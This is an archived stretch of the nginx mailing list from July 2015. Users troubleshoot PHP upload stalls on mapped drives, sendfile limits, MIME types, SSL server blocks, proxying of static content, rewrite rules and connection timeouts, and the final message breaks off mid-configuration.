upload a large file lets say 2GB and PHP must pass this file to a mapped hard drive via network sharing. PHP/Nginx does not serve traffic to anyone until that temp(uploaded file) has been successfully moved to the mapped hard drive. Does anyone know why it would be locking up like this or how to solve it ? I don't think it is Nginx i think it is just PHP that is locking up. But it is a nightmare trying to figure out how to keep it serving traffic since there will be 60-120 seconds while PHP is pushing this file to the mapped hard drive that no traffic gets served and everyones pages keep loading (they don't time out just keep loading / waiting for first byte what is always sent as soon as the file upload is complete.) If it helps its latest php builds default production config and itpp2012's Nginx Build. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260193,260193#msg-260193 From nginx-forum at nginx.us Fri Jul 10 19:06:46 2015 From: nginx-forum at nginx.us (itpp2012) Date: Fri, 10 Jul 2015 15:06:46 -0400 Subject: Nginx + PHP Windows Network Sharing Uploads locking/slow load time In-Reply-To: <7aefce195819b48a1e12c9c244a25a5a.NginxMailingListEnglish@forum.nginx.org> References: <7aefce195819b48a1e12c9c244a25a5a.NginxMailingListEnglish@forum.nginx.org> Message-ID: <201051db45a4e665f4d887303b99e7d2.NginxMailingListEnglish@forum.nginx.org> There is a no_buffer option for proxy you could try (see regular manual for correct function name). Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260193,260194#msg-260194 From nginx-forum at nginx.us Fri Jul 10 19:07:38 2015 From: nginx-forum at nginx.us (itpp2012) Date: Fri, 10 Jul 2015 15:07:38 -0400 Subject: [ANN] Windows nginx 1.9.3.1 Lizard Message-ID: <69390b2a74a8704d4e45a60ac3883e34.NginxMailingListEnglish@forum.nginx.org> 18:54 10-7-2015 nginx 1.9.3.1 Lizard Based on nginx 1.9.3 (10-7-2015) with; + Openssl-1.0.1p (CVE-2015-1793) + nginx-module-vts (new fix for 32bit total overflow counters) + Array-var-nginx-module v0.04 (upgraded 29-6-2015) + echo-nginx-module v0.58 (upgraded 29-6-2015) + encrypted-session-nginx-module v0.04 (upgraded 29-6-2015) + headers-more-nginx-module v0.26 (upgraded 29-6-2015) + lua-nginx-module v0.9.16 (upgraded 29-6-2015) + set-misc-nginx-module v0.29 (upgraded 29-6-2015) + pcre-8.37b-r1573 (upgraded 29-6-2015, more overflow fixes) + Source changes back ported + Source changes add-on's back ported + Changes for nginx_basic: Source changes back ported * Scheduled release: yes * Additional specifications: see 'Feature list' Builds can be found here: http://nginx-win.ecsds.eu/ Follow releases https://twitter.com/nginx4Windows Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260195,260195#msg-260195 From nginx-forum at nginx.us Fri Jul 10 19:17:13 2015 From: nginx-forum at nginx.us (c0nw0nk) Date: Fri, 10 Jul 2015 15:17:13 -0400 Subject: Nginx + PHP Windows Network Sharing Uploads locking/slow load time In-Reply-To: <201051db45a4e665f4d887303b99e7d2.NginxMailingListEnglish@forum.nginx.org> References: <7aefce195819b48a1e12c9c244a25a5a.NginxMailingListEnglish@forum.nginx.org> <201051db45a4e665f4d887303b99e7d2.NginxMailingListEnglish@forum.nginx.org> Message-ID: <1583028c329eb7eafa732fd5c7f317b8.NginxMailingListEnglish@forum.nginx.org> Hi itpp2012 thanks for the swift response :), I am not proxying to PHP Nginx passes the request to the fastcgi upstream Nginx + PHP are both on the same machine just the storage machine (the mapped hard drive) is seperate. I did look in the docs and find this "fastcgi_buffering off;" And "proxy_buffering off;" http://nginx.org/en/docs/http/ngx_http_fastcgi_module.html#fastcgi_buffering http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_buffering Is that what you are referring to ? I will give a go with those directives and reply back if it is fixed or not. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260193,260196#msg-260196 From nginx-forum at nginx.us Fri Jul 10 19:48:14 2015 From: nginx-forum at nginx.us (itpp2012) Date: Fri, 10 Jul 2015 15:48:14 -0400 Subject: Nginx + PHP Windows Network Sharing Uploads locking/slow load time In-Reply-To: <1583028c329eb7eafa732fd5c7f317b8.NginxMailingListEnglish@forum.nginx.org> References: <7aefce195819b48a1e12c9c244a25a5a.NginxMailingListEnglish@forum.nginx.org> <201051db45a4e665f4d887303b99e7d2.NginxMailingListEnglish@forum.nginx.org> <1583028c329eb7eafa732fd5c7f317b8.NginxMailingListEnglish@forum.nginx.org> Message-ID: <798016ab3945d7c7baf889aa7a20cf87.NginxMailingListEnglish@forum.nginx.org> c0nw0nk Wrote: ------------------------------------------------------- > I did look in the docs and find this "fastcgi_buffering off;" And "proxy_buffering off;" > > Is that what you are referring to ? Yea thats it, I knew they were there but couldn't remember them as fast. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260193,260197#msg-260197 From igal at lucee.org Fri Jul 10 19:50:53 2015 From: igal at lucee.org (Igal @ Lucee.org) Date: Fri, 10 Jul 2015 12:50:53 -0700 Subject: [ANN] Windows nginx 1.9.3.1 Lizard In-Reply-To: <69390b2a74a8704d4e45a60ac3883e34.NginxMailingListEnglish@forum.nginx.org> References: <69390b2a74a8704d4e45a60ac3883e34.NginxMailingListEnglish@forum.nginx.org> Message-ID: <55A0221D.3050703@lucee.org> > On 7/10/2015 12:07 PM, itpp2012 wrote: >> Based on nginx 1.9.3 (10-7-2015) with; is there a release for nginx 1.9.3 (non-Lizard)? I do not see it at http://nginx.org/en/download.html thanks, Igal Sapir Lucee Core Developer Lucee.org On 7/10/2015 12:07 PM, itpp2012 wrote: > 18:54 10-7-2015 nginx 1.9.3.1 Lizard > > Based on nginx 1.9.3 (10-7-2015) with; > + Openssl-1.0.1p (CVE-2015-1793) > + nginx-module-vts (new fix for 32bit total overflow counters) > + Array-var-nginx-module v0.04 (upgraded 29-6-2015) > + echo-nginx-module v0.58 (upgraded 29-6-2015) > + encrypted-session-nginx-module v0.04 (upgraded 29-6-2015) > + headers-more-nginx-module v0.26 (upgraded 29-6-2015) > + lua-nginx-module v0.9.16 (upgraded 29-6-2015) > + set-misc-nginx-module v0.29 (upgraded 29-6-2015) > + pcre-8.37b-r1573 (upgraded 29-6-2015, more overflow fixes) > + Source changes back ported > + Source changes add-on's back ported > + Changes for nginx_basic: Source changes back ported > * Scheduled release: yes > * Additional specifications: see 'Feature list' > > Builds can be found here: > http://nginx-win.ecsds.eu/ > Follow releases https://twitter.com/nginx4Windows > > Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260195,260195#msg-260195 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Fri Jul 10 20:12:14 2015 From: nginx-forum at nginx.us (itpp2012) Date: Fri, 10 Jul 2015 16:12:14 -0400 Subject: [ANN] Windows nginx 1.9.3.1 Lizard In-Reply-To: <55A0221D.3050703@lucee.org> References: <55A0221D.3050703@lucee.org> Message-ID: Igal @ Lucee.org Wrote: ------------------------------------------------------- > > On 7/10/2015 12:07 PM, itpp2012 wrote: > >> Based on nginx 1.9.3 (10-7-2015) with; > is there a release for nginx 1.9.3 (non-Lizard)? I do not see it at > http://nginx.org/en/download.html This nginx for Windows does not come from nginx.org Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260195,260201#msg-260201 From nginx-forum at nginx.us Fri Jul 10 20:21:36 2015 From: nginx-forum at nginx.us (c0nw0nk) Date: Fri, 10 Jul 2015 16:21:36 -0400 Subject: Nginx + PHP Windows Network Sharing Uploads locking/slow load time In-Reply-To: <798016ab3945d7c7baf889aa7a20cf87.NginxMailingListEnglish@forum.nginx.org> References: <7aefce195819b48a1e12c9c244a25a5a.NginxMailingListEnglish@forum.nginx.org> <201051db45a4e665f4d887303b99e7d2.NginxMailingListEnglish@forum.nginx.org> <1583028c329eb7eafa732fd5c7f317b8.NginxMailingListEnglish@forum.nginx.org> <798016ab3945d7c7baf889aa7a20cf87.NginxMailingListEnglish@forum.nginx.org> Message-ID: <30fa9fc44d2f14e218e122f2fe5fc4e7.NginxMailingListEnglish@forum.nginx.org> Those directives did not fix it. But i decided to investigate sessions and temporary upload directory of PHP. Now the temporary session directory gave me the same no loading issue until uploads have been moved to the mapped hard drive by php. But the following seemed to change that and actualy allow me to keep serving traffic with uploads being pushed to the mapped hard drive. Inside PHP.INI [PATH=C:/server/websites/public_www] upload_tmp_dir=Z:/server/websites/temp-uploads C:/ is the local machine drive where nginx + php is presant. Z:/ is the external mapped hard drive. Now i don't know why that seems to fix it perhaps someone can elaborate ? Also it comes at a cost it takes twice as long for a upload to be pushed to a mapped hard drive for some reason like that. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260193,260202#msg-260202 From nginx-forum at nginx.us Fri Jul 10 20:40:28 2015 From: nginx-forum at nginx.us (itpp2012) Date: Fri, 10 Jul 2015 16:40:28 -0400 Subject: Nginx + PHP Windows Network Sharing Uploads locking/slow load time In-Reply-To: <30fa9fc44d2f14e218e122f2fe5fc4e7.NginxMailingListEnglish@forum.nginx.org> References: <7aefce195819b48a1e12c9c244a25a5a.NginxMailingListEnglish@forum.nginx.org> <201051db45a4e665f4d887303b99e7d2.NginxMailingListEnglish@forum.nginx.org> <1583028c329eb7eafa732fd5c7f317b8.NginxMailingListEnglish@forum.nginx.org> <798016ab3945d7c7baf889aa7a20cf87.NginxMailingListEnglish@forum.nginx.org> <30fa9fc44d2f14e218e122f2fe5fc4e7.NginxMailingListEnglish@forum.nginx.org> Message-ID: Sounds like a blocking disk driver issue, look at the driver settings, dma/pio/caching/advanced sata/etc... Dynamic content is also best served from a different drive (virtual or real) then where nginx is running from. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260193,260204#msg-260204 From nginx-forum at nginx.us Fri Jul 10 21:06:59 2015 From: nginx-forum at nginx.us (c0nw0nk) Date: Fri, 10 Jul 2015 17:06:59 -0400 Subject: Nginx + PHP Windows Network Sharing Uploads locking/slow load time In-Reply-To: References: <7aefce195819b48a1e12c9c244a25a5a.NginxMailingListEnglish@forum.nginx.org> <201051db45a4e665f4d887303b99e7d2.NginxMailingListEnglish@forum.nginx.org> <1583028c329eb7eafa732fd5c7f317b8.NginxMailingListEnglish@forum.nginx.org> <798016ab3945d7c7baf889aa7a20cf87.NginxMailingListEnglish@forum.nginx.org> <30fa9fc44d2f14e218e122f2fe5fc4e7.NginxMailingListEnglish@forum.nginx.org> Message-ID: <8fc74cb8c0ddb21f6fe9805172dd4b98.NginxMailingListEnglish@forum.nginx.org> Thanks for the information :) everything is default though so i am not sure what i should even be changing anything to. On the mapped hard drive "Z:/" it has the settings http://i633.photobucket.com/albums/uu52/C0nw0nk/Untitled9.png Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260193,260205#msg-260205 From igal at lucee.org Fri Jul 10 21:11:32 2015 From: igal at lucee.org (Igal @ Lucee.org) Date: Fri, 10 Jul 2015 14:11:32 -0700 Subject: [ANN] Windows nginx 1.9.3.1 Lizard In-Reply-To: References: <55A0221D.3050703@lucee.org> Message-ID: <55A03504.2080201@lucee.org> On 7/10/2015 1:12 PM, itpp2012 wrote: > This nginx for Windows does not come from nginx.org right, but it says that it is based on nginx 1.9.3 which I can not find anywhere, so my question is: was nginx 1.9.3 released already or not yet? From nginx-forum at nginx.us Fri Jul 10 21:41:14 2015 From: nginx-forum at nginx.us (itpp2012) Date: Fri, 10 Jul 2015 17:41:14 -0400 Subject: [ANN] Windows nginx 1.9.3.1 Lizard In-Reply-To: <55A03504.2080201@lucee.org> References: <55A03504.2080201@lucee.org> Message-ID: <87316e32aa376000d0952062ae811af4.NginxMailingListEnglish@forum.nginx.org> Igal @ Lucee.org Wrote: ------------------------------------------------------- > right, but it says that it is based on nginx 1.9.3 which I can not > find > anywhere, so my question is: was nginx 1.9.3 released already or not > yet? No not yet, we always go with the latest sources, bleeding edge, you can find the original nginx.org sources on hg http://hg.nginx.org/nginx Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260195,260207#msg-260207 From subramaniam31784 at gmail.com Sat Jul 11 05:44:09 2015 From: subramaniam31784 at gmail.com (Subramaniam C) Date: Sat, 11 Jul 2015 11:14:09 +0530 Subject: NGINX plus REST monitoring API query Message-ID: HI I have deployed NGINX plus trial version in my setup. I have a query that if we use NGINX plus as a load balancer then is there any way to fetch the relationship between the virtual servers and its attached pool of servers configured in NGINX through REST monitoring API's? Thanks and Regards Subramaniam -------------- next part -------------- An HTML attachment was scrubbed... URL: From r1ch+nginx at teamliquid.net Sat Jul 11 16:46:32 2015 From: r1ch+nginx at teamliquid.net (Richard Stanway) Date: Sat, 11 Jul 2015 18:46:32 +0200 Subject: Nginx + PHP Windows Network Sharing Uploads locking/slow load time In-Reply-To: <8fc74cb8c0ddb21f6fe9805172dd4b98.NginxMailingListEnglish@forum.nginx.org> References: <7aefce195819b48a1e12c9c244a25a5a.NginxMailingListEnglish@forum.nginx.org> <201051db45a4e665f4d887303b99e7d2.NginxMailingListEnglish@forum.nginx.org> <1583028c329eb7eafa732fd5c7f317b8.NginxMailingListEnglish@forum.nginx.org> <798016ab3945d7c7baf889aa7a20cf87.NginxMailingListEnglish@forum.nginx.org> <30fa9fc44d2f14e218e122f2fe5fc4e7.NginxMailingListEnglish@forum.nginx.org> <8fc74cb8c0ddb21f6fe9805172dd4b98.NginxMailingListEnglish@forum.nginx.org> Message-ID: This is expected behavior if you are using PHP sessions. See http://php.net/manual/en/function.session-write-close.php On Fri, Jul 10, 2015 at 11:06 PM, c0nw0nk wrote: > Thanks for the information :) everything is default though so i am not sure > what i should even be changing anything to. > > On the mapped hard drive "Z:/" it has the settings > http://i633.photobucket.com/albums/uu52/C0nw0nk/Untitled9.png > > Posted at Nginx Forum: > http://forum.nginx.org/read.php?2,260193,260205#msg-260205 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Sat Jul 11 19:54:05 2015 From: nginx-forum at nginx.us (c0nw0nk) Date: Sat, 11 Jul 2015 15:54:05 -0400 Subject: Nginx + PHP Windows Network Sharing Uploads locking/slow load time In-Reply-To: References: Message-ID: So its because i'm using PHP's built in file session handler ? Should i switch it to maybe Wincache or something ? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260193,260215#msg-260215 From mdounin at mdounin.ru Sat Jul 11 22:43:48 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Sun, 12 Jul 2015 01:43:48 +0300 Subject: Lost connection after reading 2147479552 bytes with sendfile In-Reply-To: <20150710160130.GB16679@eso.org> References: <20150710160130.GB16679@eso.org> Message-ID: <20150711224348.GA93501@mdounin.ru> Hello! On Fri, Jul 10, 2015 at 06:01:30PM +0200, Mathias Andre wrote: > I've bumped into a strange problem lately, and though I've found a > workaround I thought I'd post here to try and understand what the > underlying issue can be in case it affects anyone else. > > The short version is: > Running Nginx 1.9.2 on Scientific Linux 6 with a > 2.6.32-504.8.1.el6.x86_64 kernel, nginx is configured to serve a large > file (4GB) with sendfile enabled, the file download hangs exactly after > 2147479552 bytes, after ~ 60s the connection is dropped (presumably > because of the default send_timeout). > > Setting sendfile_max_chunk to 1G fixes the problem [...] > I tried the same thing on an Ubuntu 14.04.2 without problem, however, in > this case the sendfile system call always reads much fewer bytes at a > time https://gist.githubusercontent.com/mathiasuk/018e0462d8788288d0d3/raw/error-ubuntu-14.04.02.log : > > $ grep sendfile /tmp/error-ubuntu-14.04.02.log|head > 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: @0 2147479552 > 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: 3557719 of 2147479552 @0 > 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: @3557719 2147481257 > 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: 7792477 of 2147481257 @3557719 > 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: @11350196 2147483468 > 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: 1833524 of 2147483468 @11350196 > 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: @13183720 2147480856 > 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: 1899007 of 2147480856 @13183720 > 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: @15082727 2147482393 > 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: 1964490 of 2147482393 @15082727 > > > Whereas on the SL6 box sendfile tries to read 2147479552 in one go and > nginx then seems to stop there: > > $ grep sendfile /tmp/error-sc6.5.log > 2015/07/10 17:02:22 [debug] 22749#0: *1 sendfile: @0 2147479552 > 2015/07/10 17:02:22 [debug] 22749#0: *1 sendfile: 2147479552 of 2147479552 @0 The 2147479552 is a limit applied by default to allow sendfile() to work with larger files on Linux up to 2.6.16 (see src/os/unix/ngx_linux_sendfile_chain.c for some comments). You can see the same limit on the first sendfile() call in the Ubuntu log as well. The strange thing here is that on Scientific Linux 6 the call pretends it send all the bytes in a single non-blocking call. This is not nginx expects to ever happen, and this is what causes the problem to appear. It would be interesting to dig further to understand what causes this SL6 behaviour. Using sendfile_max_chunk with some large value is a correct workaround and expected to work fine. -- Maxim Dounin http://nginx.org/ From mdounin at mdounin.ru Sun Jul 12 04:57:51 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Sun, 12 Jul 2015 07:57:51 +0300 Subject: Wrong mimetype when served from nginx In-Reply-To: <559F5F66.2010408@tengu.ch> References: <559F5F66.2010408@tengu.ch> Message-ID: <20150712045751.GC93501@mdounin.ru> Hello! On Fri, Jul 10, 2015 at 08:00:06AM +0200, C?dric Jeanneret wrote: > Hello, > > I have a small issue with my nginx (1.2.1) configuration: > some files are served as "application/octet-stream" while they are > detected as "text/plain" by "mimetype " command. > > File names are just "1", "2", and so on. > > Is there a way to enforce mimetype for those files? MIME types are determinded by nginx according to file extensions. For files without extensions the default type is used. That is, if you want nginx to serve some files without extensions as text/plain, you'll have to set default_type text/plain; in an appropriate context. > I thought about something like this: > > location ~ /path/to/file/[0-9]+ { > types {} > default_type text/plain; > } > > but after that, I get a 404 ? what did I wrong? Your error log is likely to contain some details. Looking into it usually helps to understand what goes wrong. Most likely, you have "root" configured in a location which was previously used to handle requests. There is no "root" in the new location you've added, so server default will be used (which is likely to be unset too). You'll have to either replicate the "root" directive in the location you are adding with default_type, or move it to the server{} level. See these links for some additional hints: http://nginx.org/r/location http://nginx.org/r/root -- Maxim Dounin http://nginx.org/ From nginx-forum at nginx.us Sun Jul 12 16:33:09 2015 From: nginx-forum at nginx.us (flechamobile) Date: Sun, 12 Jul 2015 12:33:09 -0400 Subject: Intermittent SSL Handshake Errors In-Reply-To: <20150322011258.GT88631@mdounin.ru> References: <20150322011258.GT88631@mdounin.ru> Message-ID: <904b763879bbcb8bb5417269bdecc01d.NginxMailingListEnglish@forum.nginx.org> I found myself with the same problem and found the cause (and obvious solution). On my nginx server I run various website and they all have their own server {} config block in separate files under 'sites-available' folder. Some sites are on different IP's and some are on the same IP. Now the cause of the problem was because I'd had set 2 server blocks listening on the same IP on SSL for different server_names like so: server { listen 37.230.101.215:443 ssl spdy; server_name www.domain1.com *.domain1.com; ssl on; ssl_certificate /etc/ssl/cert.crt; ssl_certificate_key /etc/ssl/key.key; ssl_session_cache shared:SSL:10m; ssl_session_timeout 10m; ..etc } and for another site the same: server { listen 37.230.101.215:443 ssl spdy; server_name www.domain2.com *.domain2.com; ssl on; ssl_certificate /etc/ssl/cert.crt; ssl_certificate_key /etc/ssl/key.key; ssl_session_cache shared:SSL:10m; ssl_session_timeout 10m; ..etc } When you do this it gives the exact same error as this thread is about.. might be something to check. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,256373,260227#msg-260227 From reallfqq-nginx at yahoo.fr Sun Jul 12 17:37:47 2015 From: reallfqq-nginx at yahoo.fr (B.R.) Date: Sun, 12 Jul 2015 19:37:47 +0200 Subject: Intermittent SSL Handshake Errors In-Reply-To: <904b763879bbcb8bb5417269bdecc01d.NginxMailingListEnglish@forum.nginx.org> References: <20150322011258.GT88631@mdounin.ru> <904b763879bbcb8bb5417269bdecc01d.NginxMailingListEnglish@forum.nginx.org> Message-ID: Out of thin air, I suspect it is a certificate problem. You seem to have configured *the same* certificate (and private key) for those 2 domains. Since certificates are generally tied to a single domain, that could explain errors. Another idea: have you checked nginx has been built with SNI support and you client also supports it? Problems with SNI would mean the default server certificate (since you did not define a default server for your IP address/port pair, nginx would pick up the first block containing a 'listen' directive configured for it) would be presented whatever domain you are trying to access, ending up with certificate/domain mismatch. See http://nginx.org/en/docs/http/configuring_https_servers.html. --- *B. R.* On Sun, Jul 12, 2015 at 6:33 PM, flechamobile wrote: > I found myself with the same problem and found the cause (and obvious > solution). > > On my nginx server I run various website and they all have their own server > {} config block in separate files under 'sites-available' folder. > Some sites are on different IP's and some are on the same IP. > > Now the cause of the problem was because I'd had set 2 server blocks > listening on the same IP on SSL for different server_names like so: > > server { > listen 37.230.101.215:443 ssl spdy; > server_name www.domain1.com *.domain1.com; > > ssl on; > ssl_certificate /etc/ssl/cert.crt; > ssl_certificate_key /etc/ssl/key.key; > ssl_session_cache shared:SSL:10m; > ssl_session_timeout 10m; > > ..etc > } > > and for another site the same: > > server { > listen 37.230.101.215:443 ssl spdy; > server_name www.domain2.com *.domain2.com; > > ssl on; > ssl_certificate /etc/ssl/cert.crt; > ssl_certificate_key /etc/ssl/key.key; > ssl_session_cache shared:SSL:10m; > ssl_session_timeout 10m; > > ..etc > } > > When you do this it gives the exact same error as this thread is about.. > might be something to check. > > Posted at Nginx Forum: > http://forum.nginx.org/read.php?2,256373,260227#msg-260227 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Sun Jul 12 21:09:09 2015 From: nginx-forum at nginx.us (smsmaddy1981) Date: Sun, 12 Jul 2015 17:09:09 -0400 Subject: remote server static content is not getting loaded Message-ID: Hi, ISSUE: Static content is not loaded from remote server where application is deployed, rather it is reading from the server where NGinx is installed. ------------------------------------------------------- Nginx-1.8.0 is installed (on the server nginx.corp.stel.no) Proxy pass to another server (workspace.corp.stel.no) for an webrequest Below configurations made: server { listen 80; server_name workspace.corp.stel.no; location /{ proxy_pass http://stelworkspace/workspace/agentLogin/; } location ~* \.(js|jpg|png|css|woff|svg|gif|eot|ttf)$ { root /var/gvp/Nginx/nginx-1.8.0/ser_static_info; expires 30d; } } This is reading data from local Nginx server (nginx.corp.test.no) and not from the remote server (workspace.corp.stel.no) where application is deployed Tried below option too.. location ~"*\.(js|jpg|png|css)$" { root http://workspace123/workspace/; expires 30d; } Nothing seems working Pls. assist here? If given an example...would be appreciated Best regards, Maddy Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260231,260231#msg-260231 From francis at daoine.org Sun Jul 12 21:44:22 2015 From: francis at daoine.org (Francis Daly) Date: Sun, 12 Jul 2015 22:44:22 +0100 Subject: remote server static content is not getting loaded In-Reply-To: References: Message-ID: <20150712214422.GU23844@daoine.org> On Sun, Jul 12, 2015 at 05:09:09PM -0400, smsmaddy1981 wrote: Hi there, > ISSUE: Static content is not loaded from remote server where application is > deployed, rather it is reading from the server where NGinx is installed. http://forum.nginx.org/read.php?2,259786,259821 You do not want to use "root". You do want to use "proxy_pass". Exactly what "proxy_pass" to use, depends on what the answers to the questions in that mail are. f -- Francis Daly francis at daoine.org From maxim at nginx.com Mon Jul 13 08:31:17 2015 From: maxim at nginx.com (Maxim Konovalov) Date: Mon, 13 Jul 2015 11:31:17 +0300 Subject: NGINX plus REST monitoring API query In-Reply-To: References: Message-ID: <55A37755.6030001@nginx.com> Hi Subramaniam, On 7/11/15 8:44 AM, Subramaniam C wrote: > HI > > I have deployed NGINX plus trial version in my setup. I have a > query that if we use NGINX plus as a load balancer then is there > any way to fetch the relationship between the virtual servers and > its attached pool of servers configured in NGINX through REST > monitoring API's? > please forward your requests regarding nginx-plus trials to evaluations at nginx.com. Thanks, Maxim Konovalov -- Maxim Konovalov http://nginx.com From ben+nginx at list-subs.com Mon Jul 13 10:17:16 2015 From: ben+nginx at list-subs.com (Ben) Date: Mon, 13 Jul 2015 11:17:16 +0100 Subject: Query Rewrite Help Message-ID: <55A3902C.5080205@list-subs.com> Hi, Am suffering with a bit of writer's block when it comes to query rewrites. I've got a rewrite rule that looks like : rewrite ^/api/app/([^/]+)/([^/]+)/([^/]+)?$ /api/app/$1.php?p=$2&q=$3? last; I am having two problems : - I am getting 404 when I try to make a POST call to /api/app/login, I have to use the full suffix, i.e. api/app/login.php instead. - I want to make the last ([^/]+) optional, but seem to also be getting the same 404 if I forget to include it ? Ideas most welcome, thanks ! From reallfqq-nginx at yahoo.fr Mon Jul 13 11:04:40 2015 From: reallfqq-nginx at yahoo.fr (B.R.) Date: Mon, 13 Jul 2015 13:04:40 +0200 Subject: Query Rewrite Help In-Reply-To: <55A3902C.5080205@list-subs.com> References: <55A3902C.5080205@list-subs.com> Message-ID: Your PCRE is not right. You might interpret it in more 'natural' language as: /api/app/// The URI /api/app/login does not match it. You have several ways of addressing that: - Rewrite you huge, do-it-all PCRE, adding optional, non-capturing groups - Split the rewriting rule in several versions, each addressing one depth level (eases readibility/maintenance/performance?) I would also suggest you avoid using rewrite and replace it with location/return as much as you could: https://youtu.be/YWRYbLKsS0I --- *B. R.* On Mon, Jul 13, 2015 at 12:17 PM, Ben wrote: > Hi, > > Am suffering with a bit of writer's block when it comes to query rewrites. > > I've got a rewrite rule that looks like : > > rewrite ^/api/app/([^/]+)/([^/]+)/([^/]+)?$ /api/app/$1.php?p=$2&q=$3? > last; > > I am having two problems : > > - I am getting 404 when I try to make a POST call to /api/app/login, I > have to use the full suffix, i.e. api/app/login.php instead. > > - I want to make the last ([^/]+) optional, but seem to also be getting > the same 404 if I forget to include it ? > > Ideas most welcome, thanks ! > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From ben+nginx at list-subs.com Mon Jul 13 13:38:56 2015 From: ben+nginx at list-subs.com (Ben) Date: Mon, 13 Jul 2015 14:38:56 +0100 Subject: Query Rewrite Help In-Reply-To: References: <55A3902C.5080205@list-subs.com> Message-ID: <55A3BF70.7000805@list-subs.com> Thanks ! On 13/07/2015 12:04, B.R. wrote: > Your PCRE is not right. You might interpret it in more 'natural' > language as: > /api/app/// or nothing> > The URI /api/app/login does not match it. > > You have several ways of addressing that: > - Rewrite you huge, do-it-all PCRE, adding optional, non-capturing groups > - Split the rewriting rule in several versions, each addressing one > depth level (eases readibility/maintenance/performance?) > > I would also suggest you avoid using rewrite and replace it with > location/return as much as you could: > https://youtu.be/YWRYbLKsS0I > --- > *B. R.* > > On Mon, Jul 13, 2015 at 12:17 PM, Ben > wrote: > > Hi, > > Am suffering with a bit of writer's block when it comes to query > rewrites. > > I've got a rewrite rule that looks like : > > rewrite ^/api/app/([^/]+)/([^/]+)/([^/]+)?$ > /api/app/$1.php?p=$2&q=$3? last; > > I am having two problems : > > - I am getting 404 when I try to make a POST call to > /api/app/login, I have to use the full suffix, i.e. > api/app/login.php instead. > > - I want to make the last ([^/]+) optional, but seem to also be > getting the same 404 if I forget to include it ? > > Ideas most welcome, thanks ! > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > > > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > From nginx-forum at nginx.us Mon Jul 13 16:02:44 2015 From: nginx-forum at nginx.us (dgobaud) Date: Mon, 13 Jul 2015 12:02:44 -0400 Subject: Dropped https client connection doesn't drop backend proxy_pass connection In-Reply-To: <1363321351.3854.140661204587653.70CC51E2@webmail.messagingengine.com> References: <1363321351.3854.140661204587653.70CC51E2@webmail.messagingengine.com> Message-ID: <0982748dea8239b15a3fb341057c5c2d.NginxMailingListEnglish@forum.nginx.org> Any update on this? Seeing this problem with nginx leaving connections open on AWS Beanstalk using nginx to proxy to puma/ruby on rails. nginx version: nginx/1.6.2 NAME="Amazon Linux AMI" VERSION="2015.03" ID="amzn" ID_LIKE="rhel fedora" VERSION_ID="2015.03" PRETTY_NAME="Amazon Linux AMI 2015.03" ANSI_COLOR="0;33" CPE_NAME="cpe:/o:amazon:linux:2015.03:ga" HOME_URL="http://aws.amazon.com/amazon-linux-ami/" Amazon Linux AMI release 2015.03 Linux ip-172-31-12-138 3.14.42-31.38.amzn1.x86_64 #1 SMP Wed May 13 20:33:05 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux Posted at Nginx Forum: http://forum.nginx.org/read.php?2,237386,260255#msg-260255 From nginx-forum at nginx.us Mon Jul 13 17:40:32 2015 From: nginx-forum at nginx.us (dgobaud) Date: Mon, 13 Jul 2015 13:40:32 -0400 Subject: keepalive_timeout, proxy_send_timeout, and proxy_read_timeout ignored Message-ID: Hi, I'm using AWS Beanstalk with nginx in front of a Puma server serving Ruby on Rails. I have one URL that is for an EventSource so it is kept alive and data is streamed out. I was running into this problem http://forum.nginx.org/read.php?2,237386,237386 where when the client closes the browser but nginx keeps the connection alive forever so I tried having nginx automatically close the connection after 5 seconds. I set keepalive_timeout, proxy_send_timeout, and proxy_read_timeout all to 5 seconds but all were ignored. The connection remained open until nginx was restarted. # nginx config upstream my_app { server unix:///var/run/puma/my_app.sock; } server { listen 80; server_name _ localhost; # need to listen to localhost for worker tier if ($http_x_forwarded_proto = "http") { return 301 https://$host$request_uri; } location /dashboard_stream { proxy_pass http://my_app; # match the name of upstream directive which is defined above proxy_set_header Host $host; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_buffering off; proxy_cache off; proxy_http_version 1.1; proxy_set_header Connection ''; chunked_transfer_encoding off; keepalive_timeout 5s; proxy_send_timeout 5s; 